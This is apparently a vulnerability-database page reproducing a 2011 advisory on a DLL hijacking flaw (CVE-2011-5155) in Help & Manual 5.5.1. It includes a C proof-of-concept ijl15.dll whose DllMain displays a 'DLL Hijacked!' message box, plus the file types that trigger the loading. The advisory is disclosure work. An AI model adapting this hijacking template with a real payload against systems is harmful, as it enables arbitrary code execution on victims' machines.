Help & Manual Professional Edition 5.5.1 (ijl15.dll) DLL Hijacking Exploit

🗓️ 14 Apr 2011 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 35 Views

Help & Manual 5.5.1 has a DLL hijacking vulnerability allowing arbitrary code execution.

Reporter	Title	Published	Views	Family All 8
ATTACKERKB	CVE-2011-5155	6 Sep 201210:41	–	attackerkb
Circl	CVE-2011-5155	14 Apr 201100:00	–	circl
CVE	CVE-2011-5155	6 Sep 201210:00	–	cve
Cvelist	CVE-2011-5155	6 Sep 201210:00	–	cvelist
EUVD	EUVD-2011-5055	7 Oct 202500:30	–	euvd
NVD	CVE-2011-5155	6 Sep 201210:41	–	nvd
Prion	Design/Logic Flaw	6 Sep 201210:41	–	prion
RedhatCVE	CVE-2011-5155	22 May 202501:50	–	redhatcve

<html><body><p>/*


Help &amp; Manual Professional Edition 5.5.1 (ijl15.dll) DLL Hijacking Exploit

Vendor: EC Software GmbH
Product web page: http://www.helpandmanual.com
Affected version: 5.5.1 Build 1296

Summary: Help &amp; Manual 5 is a single-source help authoring and content
management system for both single and multi-author editing.

Desc: Help &amp; Manual suffers from a DLL hijacking vulnerability that enables
the attacker to execute arbitrary code on the affected machine. The vulnerable
extensions are hmxz, hmxp, hmskin, hmx, hm3, hpj, hlp and chm thru ijl15.dll
Intel's library.

Tested on: Microsoft Windows XP Professional SP3 EN

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com


Advisory ID: ZSL-2011-5009
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5009.php


06.04.2011


*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
</windows.h></p></body></html>

14 Apr 2011 00:00Current

6.3Medium risk

Vulners AI Score6.3

CVSS 26.3

EPSS0.0013